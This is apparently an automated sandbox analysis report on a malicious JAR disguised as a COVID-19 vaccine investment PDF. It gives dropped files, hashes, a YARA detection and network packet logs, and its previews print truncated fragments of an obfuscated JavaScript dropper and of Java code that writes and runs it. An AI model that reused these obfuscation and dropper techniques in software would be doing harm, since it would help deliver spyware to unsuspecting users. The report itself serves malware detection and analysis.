                                                                                                                                          Process:C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe
                                                                                                                                          File Type:ASCII text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):737167
                                                                                                                                          Entropy (8bit):4.705946433849389
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:egg4cP9SSJTS7PEwU5tTBWoZEIZCSfq7mjJMF4taWAo/YABu1kL3QNQoxvHp6GVE:M
                                                                                                                                          MD5:EE526513580FDCE38FBD47E380081DA0
                                                                                                                                          SHA1:05A7DBB90B51A6BF6EEF394DC565A22242A4E0DD
                                                                                                                                          SHA-256:EDF1D7DFB797D66CEACE6695998240EDF67C5F08D06767A66ABC1C66830527F4
                                                                                                                                          SHA-512:C14E5381A3C569918957FC0A35B0970786B2E128709E8A26419AE96972BC8B507DD44DA51E60871AB85313C63D4045035E4A48EEE15BA2DF731A7328FCD8618F
                                                                                                                                          Malicious:false
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: C:\Users\user\fukvowbkrs.js, Author: Florian Roth
                                                                                                                                          Preview: var efr3b0h = [.function(zen1thB){..var mkk_pl4z4 = Array(zen1thB[0],......."\x6D\x6B\x6B\x5F\x70\x6C\x34\x7A\x34\x5B\x30\x5D\x20\x3D\x20\x6D\x6B\x6B\x5F\x70\x6C\x34\x7A\x34\x5B\x30\x5D\x2E");..mkk_pl4z4[0] = mkk_pl4z4[0].replace(new RegExp(">%@", "g"), "A");..var f_truth = [......."\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B",......."\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B".......];..zen1thB[1][r0bl3NP(10,9)].f_truth = f_truth;..zen1thB[1][r0bl3NP(10,9)].mkk_pl4z4 = mkk_pl4z4;..new zen1thB[1]([eval]);..return Array(function(vmk){return [mkk_pl4z4][vmk];})[0](0);.},.Array("CreateObject","Rea", "undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","Position","\x54\x79\x70\x65","Open","Write","node")..];.eval("String[\"prototype\"].l00p6x = function(){return \"m!FyIFZMJExPJEUgPSBbIlx4NTVceDQ1XHg3M1x4NDRceDQyXHg0Mlx4NTFceDNFXHgyNVx4NDBceDQzXHgzRVx4MjVceDQwXHg2N1x4NDlceDNFXHgyNVx4NDBceDRBXHg2Rlx4NTmceDU2XHgzMVx4NDlceDNFXHgyNVx4NDBceDNFX
                                                                                                                                          C:\Users\user\lib\jna-5.5.0.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1506993
                                                                                                                                          Entropy (8bit):7.990710311197979
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:BggLnybolJdaW+864NkqCUer8N7sSFOaj5lWOEMIKk6idJRWPTgzq3bICEz2lFO:BTnybo9aW+L5qCUO0xsiMPZrJgPLLIO6
                                                                                                                                          MD5:ACFB5B5FD9EE10BF69497792FD469F85
                                                                                                                                          SHA1:0E0845217C4907822403912AD6828D8E0B256208
                                                                                                                                          SHA-256:B308FAEBFE4ED409DE8410E0A632D164B2126B035F6EACFF968D3908CAFB4D9E
                                                                                                                                          SHA-512:E52575F58A195CEB3BD16B9740EADF5BC5B1D4D63C0734E8E5FD1D1776AA2D068D2E4C7173B83803F95F72C0A6759AE1C9B65773C734250D4CFCDF47A19F82AA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........^O................META-INF/....PK..........^O...L............META-INF/MANIFEST.MF.._O.0...+.;............ahehE."...cgv.}.].i...i{..s.>>.....`.....J^....{sYX.....5......[h......-....q0.6.%.|.. ..c.i../..r.-.5.0..f+.7I.;.......".IV.=.D...H.A.J_..9......M..4...W9.....6.zZ...3g..tG....3....Q..._..N.`...p.y+.n.xw4*..z+C.Y`./Jc.o..WW..;B..=.....4..Lh.~..M..Q.~.6Jp......~m..p...Z.R.V..Oq..F.U....r.a.Yh...^].?.v.b/%.=e?.kt....e..Nw..n.{.......E..].P!.h.N....N."/..._<.&..{.C!.$......O..L....,+..S..Y..9{.gX- ..R....S"...xTGm..0........*.]J.M.dT.......9.b.(....\......,'...>..].i.q/..J<.Hy..k.9H.E.J.....!.Q!....*.8...j..^.7Y..Sv..r+8..Y..4..7V........&-th..v(rZ....F.~..G.~..r.:..sj....0.-.,.....k.H[.^T.}.....UTH.)g.0..,l.6|...fr..\...t~Usz......J,....6&l}.m....M...9.cPKT1.;....h^....u.{... C...^...2%yuD.2...Z9...t.~....PK..........^O................com/PK..........^O................com/sun/PK..........^O................com/sun/jna/PK..........^O..
                                                                                                                                          C:\Users\user\lib\jna-platform-5.5.0.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Java archive data (JAR)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2681931
                                                                                                                                          Entropy (8bit):5.90068240083877
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24576:DyciOooDbK7Yw1J75n4BP/NtK2ov3mhDR6:3iOLDOZJ75nwtK2ovWh8
                                                                                                                                          MD5:2F4A99C2758E72EE2B59A73586A2322F
                                                                                                                                          SHA1:AF38E7C4D0FC73C23ECD785443705BFDEE5B90BF
                                                                                                                                          SHA-256:24D81621F82AC29FCDD9A74116031F5907A2343158E616F4573BBFA2434AE0D5
                                                                                                                                          SHA-512:B860459A0D3BF7CCB600A03AA1D2AC0358619EE89B2B96ED723541E182B6FDAB53AEFEF7992ACB4E03FCA67AA47CBE3907B1E6060A60B57ED96C4E00C35C7494
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........^O................META-INF/....PK..........^O.p..E...E.......META-INF/MANIFEST.MFManifest-Version: 1.0..Ant-Version: Apache Ant 1.10.6..Created-By: 1.8.0_201-b09 (Oracle Corporation)..Implementation-Title: com.sun.jna.platform..Implementation-Vendor: JNA Development Team..Implementation-Version: 5.5.0 (b0)..Specification-Title: Java Native Access (JNA)..Specification-Vendor: JNA Development Team..Specification-Version: 5..Automatic-Module-Name: com.sun.jna.platform..Bundle-Category: jni..Bundle-ManifestVersion: 2..Bundle-Name: jna-platform..Bundle-Description: JNA Platform Library..Bundle-SymbolicName: com.sun.jna.platform..Bundle-Version: 5.5.0..Bundle-RequiredExecutionEnvironment: J2SE-1.4..Bundle-Vendor: JNA Development Team..Require-Bundle: com.sun.jna;bundle-version="5.5.0"..Export-Package: com.sun.jna.platform;version=5.5.0, com.sun.jna.platf.. orm.dnd;version=5.5.0, com.sun.jna.platform.linux;version=5.5.0, com... sun.jna.platform.mac;version=5.5.0, com.sun.jna.plat
                                                                                                                                          C:\Users\user\lib\sqlite-jdbc-3.14.2.1.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):4322173
                                                                                                                                          Entropy (8bit):7.994785882289737
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:98304:czJoX0izQbrabWo2MxgErRYxFOY8IsFWyTIiTIzMpca:cJoXHQKW9MxRr8wZZsikzMaa
                                                                                                                                          MD5:B33387E15AB150A7BF560ABDC73C3BEC
                                                                                                                                          SHA1:66B8075784131F578EF893FD7674273F709B9A4C
                                                                                                                                          SHA-256:2EAE3DEA1C3DDE6104C49F9601074B6038FF6ABCF3BE23F4B56F6720A4F6A491
                                                                                                                                          SHA-512:25CFB0D6CE35D0BCB18527D3AA12C63ECB2D9C1B8B78805D1306E516C13480B79BB0D74730AA93BD1752F9AC2DA9FDD51781C48844CEA2FD52A06C62852C8279
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK........8f>I................META-INF/PK........7f>IzVC.....s.......META-INF/MANIFEST.MF..Oo.0.....,.k..-%..P.m..U...L2..&fm....@ .E.=o~o........7H.D.".8.5..mA.....L.c..F......!.lh..4.[H.0K...![.....Tq..1...G..@.?..\...P.."ao..S.:w.}.}.t.EW...b.6..(.5a....p.8[H*..p.bH..h..&l.w....D.e.We.<..h.=.....zx.:.W.ft.......a.....$......{..{..K..0.ZfP7.N>q......FH..4.....B.....:.q4.../..^f....;....m....V.....b..u..v0.k.S.9 .....<G...@..Bl87s.....p.K.;..5.x1.i]...:.l8_./.~.-.7....g[O...U;.$(..r..../.m.E2...=....CT..6K.9....=v=.s}..OPK........We>I................META-INF/maven/PK........We>I................META-INF/maven/org.xerial/PK........We>I............&...META-INF/maven/org.xerial/sqlite-jdbc/PK........We>I................META-INF/services/PK........QT>I................org/PK........8f>I................org/sqlite/PK........8f>I................org/sqlite/core/PK........8f>I................org/sqlite/date/PK........8f>I................org/sqlite/javax/PK........8f>I..
                                                                                                                                          C:\Users\user\lib\system-hook-3.5.jard
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Zip archive data, at least v1.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):791222
                                                                                                                                          Entropy (8bit):7.998588520286719
                                                                                                                                          Encrypted:true
                                                                                                                                          SSDEEP:24576:IhCFW8WXvOsWW9XGmvcVfkfTnzrLvadKPpv:IhCYWstW202t
                                                                                                                                          MD5:E1AA38A1E78A76A6DE73EFAE136CDB3A
                                                                                                                                          SHA1:C463DA71871F780B2E2E5DBA115D43953B537DAF
                                                                                                                                          SHA-256:2DDDA8AF6FAEF8BDE46ACF43EC546603180BCF8DCB2E5591FFF8AC9CD30B5609
                                                                                                                                          SHA-512:FEE16FE9364926EC337E52F551FD62ED81984808A847DE2FD68FF29B6C5DA0DCC04EF6D8977F0FE675662A7D2EA1065CDCDD2A5259446226A7C7C5516BD7D60D
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK.........x.N................META-INF/PK.........x.N................META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r,J..,K-B...V..+.$x...R.KRSt.*......3R.|..R....L..y..J3sJ....&.f.f...]..l.-.z.zF.\.\.PK..PSF.m.......PK........lx.N................lc/PK........lx.N................lc/kra/PK........mx.N................lc/kra/system/PK........mx.N................lc/kra/system/keyboard/PK........mx.N................lc/kra/system/keyboard/event/PK.........x.N................lc/kra/system/lib/PK........mx.N................lc/kra/system/mouse/PK........mx.N................lc/kra/system/mouse/event/PK........mx.N............"...lc/kra/system/GlobalHookMode.class.R]o.A.=...,_[.R...Z....O....6Y..m1..W.v.M.h.4.F..?.xg%.b..pO..s.;3.~......0Dl(."'!%!. .M..d..*nq.S.I..24...;..Z.z..0,.N.p.3..O...-.t.......{......Uu..M.-5.7..i.`Xy7.3ta:C.....%....q.v..a.e.N.C;..r...........n.`.z..)...j..6.....XSt..k.....=..[.;.5.{.....q...GJB...J..7.L...a.2.........6w.0M..j*..C.T.Qb..RT..3..XQ.GBE.....
                                                                                                                                          C:\Users\user\vmlpusjwhz.txt
                                                                                                                                          Process:C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):93302
                                                                                                                                          Entropy (8bit):7.907636664666169
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:/1qTnJjXcA/88jc5w+e6saZGIhw8c+/MCZdCa9aQ7IakSyEvaogK0imdgIJX0H:dqTNV9+wdDaZn9/MCZdN7RkSy0ajA+JA
                                                                                                                                          MD5:6A1EFB0C410A7790DBC75FD29ADC48D6
                                                                                                                                          SHA1:5589EAD30D23C96DC8AE7BA03D03066BCB1B17EF
                                                                                                                                          SHA-256:DFC703A9B8498AA24306908FCE67CBF894C7861E07FF778E3FD62315684B579B
                                                                                                                                          SHA-512:7C331441848875875DF4F39E7AF59C040C0EDD010666894C69178064EB52E1A3E310BBF62A35FDF1B2F6EE372B68D75AE395E9EC92ECFFB150EF2B5C5570205F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: PK..........WR................META-INF/MANIFEST.MF].=O.0.EwK..o,.M\ZQyk#6B..b}._..'..+.......w....p...E.R.>N..l8;N..qF..TV.T.......E.v'..0J.....6.9&,5|.Y.~.m..5XL.8.(WXkV*.....7.y.F......^....0....C.........#.Bbp.....[.V..h.].....g.|.....s...%.u....0..>8.8..PK...&......-...PK..........WR................carLambo/resources/config.txt.... ....r.h..h..=.._i.LG.........1..KK..kRo..h...L.t[.06...u..4....y.....3>.H29.jql^e}..5..A[i....t.p.5.......#t.@..`..M..e.-.:T?n...mF.._..G..6.D\.r.AZ/.. .Hq.....{../....mQ..)}../...PK..)!..........PK..........WR................carLambo/sbsgssdfg.class.Xy|.W........XJ..P .f.@....$..I.B.]b..;{.f..L(H.T.....U.Gl...]..W....>Zo..=.Z.....fg........}....x.w..v......h.......b%.....@...R+..B.;%.K.%.G.{%.O..%.$..0".!..K....J....I...GE|I..D<&.."~(.G"~,.'"~*.g"~..."~).W"...l!.E.!..e.1lg.g..a..~.73....o+.\....n..U.!...od..p3...:p.3_...W ...lu............a...!.p#.-......2.....;.......b.j...jq...).A../......e8..#x../..'...0|..b.o.CN<.O..I
                                                                                                                                          C:\jar\META-INF\MANIFEST.MF
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):61
                                                                                                                                          Entropy (8bit):4.7373932798666365
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:3:ZLCAWIzBEb2bIIT/fbhn:1KItG2bIif9
                                                                                                                                          MD5:1EE8E1A0462F25F07B4DBF06F695AB24
                                                                                                                                          SHA1:77384293E385C5E84D31957A55D54EECB7987780
                                                                                                                                          SHA-256:50B85BA7210C8BFE4B43E3F0BC2C2ADAF553A81EBF6F1760605BC974DA4FFF2A
                                                                                                                                          SHA-512:7A51A0C14DE218A46FF088CB07B917ECAEE04B07C14D9F0F96EB9189517E16093DE962E9C3525A1BEAA7A034DCAB763C9C7105C819F9A870412872E7A20A7C9C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: Manifest-Version: 1.0..Main-Class: keuqzwqbvn.Mmwwrnygnfl....
                                                                                                                                          C:\jar\keuqzwqbvn\Mlncjyhbeex.class
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:compiled Java class data, version 50.0 (Java 1.6)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):830
                                                                                                                                          Entropy (8bit):5.404149665200583
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:5uWyQulrLOIGHBkjW1Pe4g591b/6G69JU:5uWyFlri7HBKWbg59UG
                                                                                                                                          MD5:ECC9EEE8A05B0512B8D0A5BCAD7F226A
                                                                                                                                          SHA1:B5E86BD53AC08A7CDE0415C2358DF39C2F2D6988
                                                                                                                                          SHA-256:C70E1B34DDE5968C6DE14F23F3AF4042D46D30336534C70A0ACB54BD07824EF9
                                                                                                                                          SHA-512:76D555A6BECA72FE46778492D0E728E1E08B2A6BF70D002B39EF2BEA153D92415C1ABD8C1CD296C0536109DCA9EA068620DA7E43C6B91947CD36A9FD9E104AE2
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .......2.1................... .... ..!..".#..$..%...<init>...()V...Code...LineNumberTable...t1nUbU..2(Ljava/io/InputStream;Ljava/io/FileOutputStream;)V...StackMapTable..&..$..'..(..!...b1g4Nth..)(Ljava/lang/Runtime;[Ljava/lang/String;)V...Exceptions...SourceFile...Mmwwrnygnfl.java.......'..).*..(..+.,..-.....java/lang/Exception...../.0...keuqzwqbvn/Mlncjyhbeex...java/lang/Object...[B...java/io/InputStream...java/io/FileOutputStream...read...([BII)I...write...([BII)V...close...java/lang/Runtime...exec..(([Ljava/lang/String;)Ljava/lang/Process;. ................................*.........................................0.>.....:.+.........Y>...,..........+...,......N......+..........."...............#...'...+......./. .................................................#........+,...W................"...#....................
                                                                                                                                          C:\jar\keuqzwqbvn\Mmwwrnygnfl.class
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:compiled Java class data, version 50.0 (Java 1.6)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1582
                                                                                                                                          Entropy (8bit):5.578097902648525
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:iADsrmDul0zOQbpi55UDV++vLRDCNQzw/WXurvNwHhWwSc+:JsrmKlJcpU5UDgQ+SztgvshWwh+
                                                                                                                                          MD5:9452592892A800D155BC45667FA3BB75
                                                                                                                                          SHA1:8245B9ECBD34DBEA7DF48EEC85AD1A1CB18C6D27
                                                                                                                                          SHA-256:F0283C3945E263B9DE97C6A1FC1CF42DD1D8F9DD8DD8CDD44D8550E86DBB8A8F
                                                                                                                                          SHA-512:BD99C29EDCCDAB2129413D0D555D0ABB117FEFFC64BD4C69ED0EF3923444FA036B88BE782B1057E87D038B41E7C3338A330F634FB8A51CDEEA2B95721ED56F38
                                                                                                                                          Malicious:false
                                                                                                                                          Preview: .......2.Y....*..+....,..-...../.0..1....2....3..4.5....6..7..8....*..9..:.;....<..=.>..?....@..A....B....C....6....3..D...<init>...([Ljava/lang/Object;)V...Code...LineNumberTable...Exceptions..E...q22RDt...main...([Ljava/lang/String;)V...b1g4Nth..)(Ljava/lang/Runtime;[Ljava/lang/String;)V...t1nUbU..2(Ljava/io/InputStream;Ljava/io/FileOutputStream;)V...SourceFile...Mmwwrnygnfl.java....F...java/lang/Object..!.....keuqzwqbvn/Mmwwrnygnfl...[Ljava/lang/String;..G..H.I...java/io/FileOutputStream....J..&.'..K..L.M..$.%...java/lang/String...java/lang/StringBuilder...user.home..N..O.P..Q.R..S..T.U...fukvowbkrs.js..V.W...resources/umxybpjabc....X........keuqzwqbvn/Mlncjyhbeex...java/lang/Exception...()V...java/lang/Class...getResourceAsStream..)(Ljava/lang/String;)Ljava/io/InputStream;...(Ljava/lang/String;)V...java/lang/Runtime...getRuntime...()Ljava/lang/Runtime;...java/lang/System...getProperty..&(Ljava/lang/String;)Ljava/lang/String;...append..-(Ljava/lang/String;)Ljava/lang/StringBuilder;.
                                                                                                                                          C:\jar\keuqzwqbvn\resources\umxybpjabc
                                                                                                                                          Process:C:\Windows\System32\7za.exe
                                                                                                                                          File Type:ASCII text, with very long lines
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):737167
                                                                                                                                          Entropy (8bit):4.705946433849389
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:egg4cP9SSJTS7PEwU5tTBWoZEIZCSfq7mjJMF4taWAo/YABu1kL3QNQoxvHp6GVE:M
                                                                                                                                          MD5:EE526513580FDCE38FBD47E380081DA0
                                                                                                                                          SHA1:05A7DBB90B51A6BF6EEF394DC565A22242A4E0DD
                                                                                                                                          SHA-256:EDF1D7DFB797D66CEACE6695998240EDF67C5F08D06767A66ABC1C66830527F4
                                                                                                                                          SHA-512:C14E5381A3C569918957FC0A35B0970786B2E128709E8A26419AE96972BC8B507DD44DA51E60871AB85313C63D4045035E4A48EEE15BA2DF731A7328FCD8618F
                                                                                                                                          Malicious:false
                                                                                                                                          Yara Hits:
                                                                                                                                          • Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: C:\jar\keuqzwqbvn\resources\umxybpjabc, Author: Florian Roth
                                                                                                                                          Preview: var efr3b0h = [.function(zen1thB){..var mkk_pl4z4 = Array(zen1thB[0],......."\x6D\x6B\x6B\x5F\x70\x6C\x34\x7A\x34\x5B\x30\x5D\x20\x3D\x20\x6D\x6B\x6B\x5F\x70\x6C\x34\x7A\x34\x5B\x30\x5D\x2E");..mkk_pl4z4[0] = mkk_pl4z4[0].replace(new RegExp(">%@", "g"), "A");..var f_truth = [......."\x6D\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x64\x22\x29\x3B",......."\x21\x22\x2C\x20\x22\x67\x22\x29\x2C\x20\x22\x6D\x22\x29\x3B".......];..zen1thB[1][r0bl3NP(10,9)].f_truth = f_truth;..zen1thB[1][r0bl3NP(10,9)].mkk_pl4z4 = mkk_pl4z4;..new zen1thB[1]([eval]);..return Array(function(vmk){return [mkk_pl4z4][vmk];})[0](0);.},.Array("CreateObject","Rea", "undefined","\x61\x64\x6F\x64\x62\x2E","\x43\x68\x61\x72\x53\x65\x74","Position","\x54\x79\x70\x65","Open","Write","node")..];.eval("String[\"prototype\"].l00p6x = function(){return \"m!FyIFZMJExPJEUgPSBbIlx4NTVceDQ1XHg3M1x4NDRceDQyXHg0Mlx4NTFceDNFXHgyNVx4NDBceDQzXHgzRVx4MjVceDQwXHg2N1x4NDlceDNFXHgyNVx4NDBceDRBXHg2Rlx4NTmceDU2XHgzMVx4NDlceDNFXHgyNVx4NDBceDNFX

                                                                                                                                          Static File Info

                                                                                                                                          General

                                                                                                                                          File type:Zip archive data, at least v2.0 to extract
                                                                                                                                          Entropy (8bit):7.699961628296007
                                                                                                                                          TrID:
                                                                                                                                          • Java Archive (13504/1) 62.80%
                                                                                                                                          • ZIP compressed archive (8000/1) 37.20%
                                                                                                                                          File name:Covid19_Vacine_Investment_Proposals_1st_Quarter2021 pdf.jar
                                                                                                                                          File size:178235
                                                                                                                                          MD5:5435ec679cdd07fe6f4fc6f49a117ea8
                                                                                                                                          SHA1:eab4494e7db4bcbebf9dc5c0197ce0081a6dda6e
                                                                                                                                          SHA256:5a962977909fafba0a1c202306068bd5f8297335b16989a07c1f119302155c84
                                                                                                                                          SHA512:b4b1a09413019c70867cfb2ddfb95ea21c86775991c1f8008e72af045abf9bcb436bdcc20affda4275fbc8216c4649f3b667ff0846215c38c5af026301b88380
                                                                                                                                          SSDEEP:3072:EIeObnK0Jmn6IhnudnEozlLaEd9J1vqmGzp5rlHh3tn/9Yj4Yw54bfTRykQRYb:EI3bKrn6MuVE8lD9LSmGrrv38sYw5s7X
                                                                                                                                          File Content Preview:PK.........aWR.V..U....?....$.keuqzwqbvn/resources/umxybpjabc.. ..........{)......-)......-).......}.#.u...>.w..$.0.e.Y#..f.lm.(..a.......=&.eaV..+.w..so..a5.Y.bw....(........{............7......|..o..............o.....>..?=}..t..o._N/.>...>..q....W?../..

                                                                                                                                          File Icon

                                                                                                                                          Icon Hash:d28c8e8ea2868ad6

                                                                                                                                          Network Behavior

                                                                                                                                          Network Port Distribution

                                                                                                                                          TCP Packets

                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Feb 23, 2021 21:04:22.712953091 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.713040113 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.713053942 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.714381933 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:22.755150080 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.755253077 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:22.756622076 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.756649971 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.756688118 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.756747961 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.756810904 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.756815910 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.823820114 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:22.823934078 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.824155092 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.824196100 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.865644932 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.865699053 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.865737915 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.865792990 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:22.867369890 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.867424011 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.867521048 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868551970 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868596077 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868626118 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868664026 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868701935 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868707895 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.868731022 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868769884 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868802071 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.868817091 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868848085 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:22.868905067 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.945523977 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.969150066 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:22.969197989 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.969592094 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.991509914 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.991631031 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.991683006 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.991844893 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:22.995605946 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.995722055 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.995753050 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:22.995789051 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:23.032128096 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.032454014 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.034961939 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.034984112 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.036494017 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.036879063 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.039002895 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.039037943 CET44349720199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.039216042 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.040357113 CET44349719199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.045011997 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:23.045314074 CET49719443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.045366049 CET49718443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.045392990 CET49720443192.168.2.3199.232.192.209
                                                                                                                                          Feb 23, 2021 21:04:23.091630936 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091659069 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091677904 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091695070 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091715097 CET44349721140.82.121.3192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091743946 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091758966 CET49721443192.168.2.3140.82.121.3
                                                                                                                                          Feb 23, 2021 21:04:23.091768026 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091792107 CET44349718199.232.192.209192.168.2.3
                                                                                                                                          Feb 23, 2021 21:04:23.091794968 CET49721443192.168.2.3140.82.121.3
